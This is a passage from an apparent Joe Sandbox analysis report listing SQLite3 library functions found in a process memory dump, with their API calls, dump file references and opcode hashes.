                                                    • sqlite3_finalize.SQLITE3 ref: 61E7600A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_finalize$sqlite3_step
                                                    • String ID: bWa$integer$null$real
                                                    • API String ID: 2395141310-37276400
                                                    • Opcode ID: 28454aef1133ce81b7ef22e663fa179a5f063abb0412176de011d23496a07b8b
                                                    • Instruction ID: 380139b90279dbed588fb9135178fed73351558dc62e11b4162495c9011c8133
                                                    • Opcode Fuzzy Hash: 28454aef1133ce81b7ef22e663fa179a5f063abb0412176de011d23496a07b8b
                                                    • Instruction Fuzzy Hash: BB4108B4904755CFDB14CF69C080A5ABBF0BF88314F25C96ED848AB305D339E881CBA5
                                                    Function 61E19C09 Relevance: 13.9, APIs: 9, Instructions: 399COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 423083942-0
                                                    • Opcode ID: 05a973b46aa988676561f50e7b82ff5c596e4acb3135ac82fe5cb23e32edd297
                                                    • Instruction ID: 96655a13b1ce4a298733e79ad7cb53ce39e6fcc9707cae855506a20dcb0244ae
                                                    • Opcode Fuzzy Hash: 05a973b46aa988676561f50e7b82ff5c596e4acb3135ac82fe5cb23e32edd297
                                                    • Instruction Fuzzy Hash: 7D02F274A09249DFDB04CFA8C581A9EBBF1FF88314F258559E855AB319D730E886CF90
                                                    Function 61E25644 Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E25663
                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 61E25744
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E2576A
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E259E6
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A13
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A1D
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E25A83
                                                    • sqlite3_result_text.SQLITE3 ref: 61E25BA6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 2444656285-0
                                                    • Opcode ID: 8bd9240d5f78d2f05e6ab3c62348391970a873bbfd2ba0832bfedd4096d4ca5b
                                                    • Instruction ID: 66ceece580239dff9f1ae1dd0e73e63bf0195750f72caa9d5be9794d5b801e55
                                                    • Opcode Fuzzy Hash: 8bd9240d5f78d2f05e6ab3c62348391970a873bbfd2ba0832bfedd4096d4ca5b
                                                    • Instruction Fuzzy Hash: 09E1ADB594835ACFDB208F58C9907D9BBF1BF8A308F25C4A9D89857348D774D9828F42
                                                    Function 61E24ED6 Relevance: 13.6, APIs: 9, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_mallocsqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 1733351873-0
                                                    • Opcode ID: fe609bddcc19e85ba28cb93d2eb08c1425179deb016b148477ceb66cf2c4b0d6
                                                    • Instruction ID: 40e0434e45044f806f1c4190abcaa8d67d708aa1fc5d8c4cee2e26a3b102c53f
                                                    • Opcode Fuzzy Hash: fe609bddcc19e85ba28cb93d2eb08c1425179deb016b148477ceb66cf2c4b0d6
                                                    • Instruction Fuzzy Hash: 7D310D70A087468FDB10EFB9C89495EBBE0AF88344F21C42EE884D7345E739D8918B52
                                                    Function 61E89C50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                    • String ID: @
                                                    • API String ID: 1503958624-2766056989
                                                    • Opcode ID: 2c8bcda8e4050031f46cccc378820eb75e317f77b8ce7ae0d970368e67837ae3
                                                    • Instruction ID: 675d1e8d659a44ba4f0127917fcff0ac935f310e1fce8f6366ecc4b0106cd8ec
                                                    • Opcode Fuzzy Hash: 2c8bcda8e4050031f46cccc378820eb75e317f77b8ce7ae0d970368e67837ae3
                                                    • Instruction Fuzzy Hash: 6A4148B1905B029FD780EF69C58461ABBE0BBC5358F65CD1DE89D97380E734E884CB92
                                                    Function 61E882E3 Relevance: 12.3, APIs: 8, Instructions: 274COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1657278834-0
                                                    • Opcode ID: 0a203a4774d8e7da008ed75f57fd146355fbdc67278ca05d8500800b8b54b95a
                                                    • Instruction ID: 9432070c06cb57d6e911eb20e097731c74014480d901bc1137dfc1320a88c786
                                                    • Opcode Fuzzy Hash: 0a203a4774d8e7da008ed75f57fd146355fbdc67278ca05d8500800b8b54b95a
                                                    • Instruction Fuzzy Hash: 6CB16975A0524ACBDB40CFA9C880A9DB7F1FF89318F28C529EC68AB345D734E901DB51
                                                    Function 61E5E252 Relevance: 12.2, APIs: 8, Instructions: 215COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28A96: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5DAC5), ref: 61E28ADA
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E5E29B
                                                    • sqlite3_prepare_v2.SQLITE3 ref: 61E5E2D9
                                                    • sqlite3_step.SQLITE3 ref: 61E5E32E
                                                    • sqlite3_errmsg.SQLITE3 ref: 61E5E4CB
                                                      • Part of subcall function 61E260ED: sqlite3_log.SQLITE3 ref: 61E26116
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                    • String ID:
                                                    • API String ID: 154587148-0
                                                    • Opcode ID: 04bb2b0c6420c5596a2304cda7886a9ab62379de5b0e6d53ade7bd156d4498a7
                                                    • Instruction ID: dd7f8e694c4f9ea535db3785af09231da8a769642870356d7ddc7a768911d25a
                                                    • Opcode Fuzzy Hash: 04bb2b0c6420c5596a2304cda7886a9ab62379de5b0e6d53ade7bd156d4498a7
                                                    • Instruction Fuzzy Hash: 508107B0E0865A8BDB50DFAAC48479EFBF1AF89308F24C429E854E7340D775D855CB91
                                                    Function 61E7607B Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 325COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E760A9
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E764DA
                                                      • Part of subcall function 61E5EDE5: sqlite3_strnicmp.SQLITE3 ref: 61E5EE71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                    • String ID: 2$foreign key$indexed$Wa
                                                    • API String ID: 100587609-469184487
                                                    • Opcode ID: 3d51f45343200c2839075818ddfe3197a41f5cc3547c9056dfe3634b7162f4a6
                                                    • Instruction ID: 512f5772a026ccbf28254b371a834e41264fed853778f8769533895c7448048f
                                                    • Opcode Fuzzy Hash: 3d51f45343200c2839075818ddfe3197a41f5cc3547c9056dfe3634b7162f4a6
                                                    • Instruction Fuzzy Hash: 1DE1F774A05289DFEB54CFA8D480B9EBBF1BF88308F20C529E855AB355D734E846CB51
                                                    Function 61E2493A Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                    • String ID:
                                                    • API String ID: 3386002893-0
                                                    • Opcode ID: a35b31c419476287316f38327b5cd54c7c4589c99523709e14bc00ec4569292a
                                                    • Instruction ID: c35453f19eaab3620c2f04098610e05978b850d7f039baea7e73aaca459f1df6
                                                    • Opcode Fuzzy Hash: a35b31c419476287316f38327b5cd54c7c4589c99523709e14bc00ec4569292a
                                                    • Instruction Fuzzy Hash: C2618EB1A042568FDB01CFACC4A069DBBF1AF89318F25C56ED8A5A7391E730C841CF55
                                                    Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: Sleep_amsg_exit
                                                    • String ID:
                                                    • API String ID: 1015461914-0
                                                    • Opcode ID: 354b53e7159aa5500a78f9eacd42832eb55ecf60014174467c6247eb26b3b128
                                                    • Instruction ID: c2cc557666b7a1d0ad8e663bb2bdd622dd0eaded8891b7deae7852dca82b45fc
                                                    • Opcode Fuzzy Hash: 354b53e7159aa5500a78f9eacd42832eb55ecf60014174467c6247eb26b3b128
                                                    • Instruction Fuzzy Hash: 634160B0615A418BEB41AFE9C58531A7BF1BB8534DF64C92ED6888F380D775C491C782
                                                    Function 61E37262 Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_result_error.SQLITE3 ref: 61E3728A
                                                    • sqlite3_value_int.SQLITE3 ref: 61E3729C
                                                    • sqlite3_value_text.SQLITE3 ref: 61E372B2
                                                    • sqlite3_value_text.SQLITE3 ref: 61E372C0
                                                    • sqlite3_result_text.SQLITE3 ref: 61E373A2
                                                    • sqlite3_free.SQLITE3 ref: 61E373AD
                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E373C3
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                    • String ID:
                                                    • API String ID: 2838836587-0
                                                    • Opcode ID: 3855afbaacf4b129cd0b7317c565d35260e7b804b081d1566384a005b6b5c84a
                                                    • Instruction ID: e555278e31a930ff02e48dd0edbcdffba914487cd3f5df86c882a03629ae4df9
                                                    • Opcode Fuzzy Hash: 3855afbaacf4b129cd0b7317c565d35260e7b804b081d1566384a005b6b5c84a
                                                    • Instruction Fuzzy Hash: 2A5162B4904359DFCB00DFA8C48569EBBF4AF88754F108929E898AB354E734D945CF51
                                                    Function 61E2479A Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                    • String ID:
                                                    • API String ID: 2264764126-0
                                                    • Opcode ID: e87ec02c1dd4f7bd48c1d20cdebced10c1e7bc68b5234cf2f06e5fdbb4c9bb63
                                                    • Instruction ID: d70b033e98f18d3d0ca15199638216c8f6716ddfe36afa8d788cdfb617ff0c6c
                                                    • Opcode Fuzzy Hash: e87ec02c1dd4f7bd48c1d20cdebced10c1e7bc68b5234cf2f06e5fdbb4c9bb63
                                                    • Instruction Fuzzy Hash: F2315E71A146968BDB08DFA9C4A06ADFBE1EF8C314F25842EE868D7310E775D841CB51
                                                    Function 61E38989 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E389D3
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38A02
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E38A27
                                                      • Part of subcall function 61E382CE: sqlite3_mprintf.SQLITE3 ref: 61E382E3
                                                      • Part of subcall function 61E382CE: sqlite3_result_error.SQLITE3 ref: 61E382F9
                                                      • Part of subcall function 61E382CE: sqlite3_free.SQLITE3 ref: 61E38301
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                    • String ID: insert$set
                                                    • API String ID: 832408550-3711289001
                                                    • Opcode ID: 7799c58935f586738ea74dbeb9fe4e998121244cdeeec933d262bd4c4b846a49
                                                    • Instruction ID: 42b5959de5a8f565ca5da52ecd0ca37d02c17e3196387ffdf7051dc380fadcef
                                                    • Opcode Fuzzy Hash: 7799c58935f586738ea74dbeb9fe4e998121244cdeeec933d262bd4c4b846a49
                                                    • Instruction Fuzzy Hash: EA314B70A042589FDB01DFA8C484A9DBBF5BFC4318F28C559E884CB355E735E946DB41
                                                    Function 61E344D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_result_error.SQLITE3 ref: 61E344FD
                                                    • sqlite3_result_error.SQLITE3 ref: 61E34560
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_error
                                                    • String ID: J
                                                    • API String ID: 497837271-1141589763
                                                    • Opcode ID: f30f63485dfa20c1efbbc25d3765887b7d1ffb0b52fa626ef55f80026b118446
                                                    • Instruction ID: abdb6cf436e1596d3b2e8d78752d3c56e484842776b47e80c5e41ef356ae7b56
                                                    • Opcode Fuzzy Hash: f30f63485dfa20c1efbbc25d3765887b7d1ffb0b52fa626ef55f80026b118446
